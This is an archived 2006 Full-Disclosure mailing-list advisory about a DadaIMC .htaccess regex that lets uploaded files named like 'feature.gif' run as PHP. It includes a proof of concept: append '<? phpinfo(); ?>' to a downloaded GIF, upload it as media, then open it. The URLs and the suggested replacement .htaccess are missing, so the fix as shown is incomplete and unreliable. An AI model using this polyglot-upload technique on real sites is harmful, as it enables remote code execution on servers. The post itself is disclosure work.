lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 9 Dec 2006 23:39:02 -0600
From: "Hagbard Celine" <>
Subject: DadaIMC default configuration vulnerability

The instructions for installing Dada into a shared environment lists the
following .htaccess file:


<FilesMatch "(feature|editor|newswire|otherpress|admin|pbook|media|mod)">
 ForceType application/x-httpd-php

The problem is that the regular expression in FilesMatch allows any
uploaded files with the words
feature|editor|newswire|otherpress|admin|pbook|media|mod in the name to be
executed as php code provided they can be passed through the mime filter.


~$ wget -O [^]
:~$ wget -O feature.gif
--14:14:11-- [^]
           => `feature.gif'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8,558 (8.4K) [image/gif]
8,558 --.--K/s

14:14:11 (200.27 KB/s) - `feature.gif' saved [8558/8558]

:~$ echo "<? phpinfo(); ?>" >> feature.gif

create a new article and upload feature.gif as a media file.

Right click on the google logo after submitting the article, click copy
image location, paste into new window. Scroll down to see phpinfo()

To Fix, upgrade to software where the author has a clue about security.

Until you can manage that, a temporary fix would be to change the .htaccess
file to read:


or use the location directive in httpd.conf instead.

Content of type "text/html" skipped

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

Powered by blists - more mailing lists